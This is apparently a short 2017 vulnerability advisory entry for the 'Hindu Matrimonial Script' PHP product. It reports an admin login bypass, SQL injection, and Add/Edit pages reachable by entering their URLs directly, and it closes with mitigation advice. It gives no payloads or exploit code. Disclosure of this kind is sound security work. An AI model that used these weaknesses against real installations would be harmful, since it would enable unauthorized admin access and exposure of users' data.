Vendor: Hindu Matrimonial Script
By: İhsan Şencan
CVSS: 7.5 (HIGH)
Admin Login Bypass & SQLi
CWE: 89
Product Name: Hindu Matrimonial Script
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2017
Admin Login Bypass & SQLi + Add/Edit
The vulnerability allows an attacker to bypass the admin login page and gain access to the admin panel of the Hindu Matrimonial Script. The attacker can also reach the script's Add/Edit pages by entering their URLs directly. The vulnerable script is hosted on http://www.phpmatrimonialscript.in/ and the vulnerable version is unknown.
Mitigation:
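Ensure that the admin login page is properly secured, that the Add/Edit pages cannot be reached without an authenticated admin session, and that all user input is properly sanitized and validated and reaches the database only through parameterized queries.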